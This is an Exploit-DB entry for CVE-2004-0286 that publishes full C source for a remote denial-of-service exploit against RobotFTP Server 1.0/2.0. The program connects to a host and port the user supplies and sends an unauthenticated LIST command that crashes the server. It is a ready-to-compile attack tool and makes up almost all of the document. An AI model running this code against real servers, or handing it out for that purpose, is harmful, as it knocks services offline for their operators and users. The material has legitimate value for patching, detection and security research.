RobotFTP Server 1.0/2.0 - Username Buffer Overflow Vulnerability 2

2004-02-16T00:00:00
ID EDB-ID:23709
Type exploitdb
Reporter NoRpiuS
Modified 2004-02-16T00:00:00

Description

RobotFTP Server 1.0/2.0 Username Buffer Overflow Vulnerability (2). CVE-2004-0286. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/9672/info
 
A vulnerability has been reported for RobotFTP Server. The problem likely occurs due to insufficient bounds checking when processing 'USER' command arguments of excessive length.

/*************************************************************************************************
*                                                                                                *
* Date: 18/2/2004                                                                                *
* Url: www.robotftp.com                                                                          *
* Versions: 1.0/2.0                                                                              *
* Bug: Robotftp gets DoS'sed when an unauthorized user tries to do some command like MKD or LIST *
* Author: NoRpiUs                                                                                *
* Email: norpius@altervista.org                                                                  *
* Web: http://norpius.altervista.org                                                             *
* For Unix & Win                                                                                 *
*                                                                                                *
* I have done this for my birthday that is today :) - Robo-SOFT don't be angry :)                *
**************************************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#ifdef WIN32
    #include <winsock.h>
    #include <windows.h>
    #define close closesocket
#else
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif
#define DOSREQUEST "\x4C\x49\x53\x54\r\n"

void errore( char *err )
{
	printf("%s",err);
	exit(1);
}

void usage( char *progz )
{
	fputs("Robotftp FTP Server remote DoS\n"
	      "By NoRpiUs\n"
	      "Usage: <host> <port>\n", stdout);
	exit(1);
}

int main( int argc, char *argv[] )
{
	int sock;
	struct hostent *he;
	struct sockaddr_in target;
	char recvbuff[512];

#ifdef WIN32
    WSADATA wsadata;
    WSAStartup(0x1, &wsadata);
#endif

	if ( argc < 3 ) usage(argv[0]);

	if ( (he = gethostbyname(argv[1])) == NULL )
		errore("Can't resolve host");

	target.sin_family = AF_INET;
	target.sin_addr   = *(( struct in_addr *) he -> h_addr );
	target.sin_port   = htons(atoi(argv[2]));

	fputs("[+] Connecting...\n", stdout);

	if ( (sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP )) < 0)
		errore("[-] Can't create socket\n");

	if ( connect(sock, (struct sockaddr *) &target, sizeof(target)) < 0 )
		errore("[-] Can't connect\n");	

	if ( recv( sock, recvbuff, sizeof(recvbuff), 0) < 0 )
		errore("[-] Server seems to be down\n");

	fputs("[+] Sending DoS request\n", stdout);

	if ( send( sock, DOSREQUEST, strlen(DOSREQUEST), 0) < 0 )
		errore("[-] Cant' send the request\n");

	fputs("[+] Done\n", stdout);

	close(sock);

	return(0);

}